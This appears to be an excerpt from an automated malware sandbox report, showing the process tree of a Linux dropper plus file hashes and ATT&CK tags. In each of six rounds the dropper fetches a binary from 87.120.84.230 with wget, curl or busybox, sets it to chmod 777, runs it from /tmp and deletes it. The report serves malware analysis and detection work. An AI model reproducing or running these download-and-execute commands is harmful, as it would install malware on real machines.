PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:1624
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:1630
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:1636
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:1642
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:1648
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1654
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:1657
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97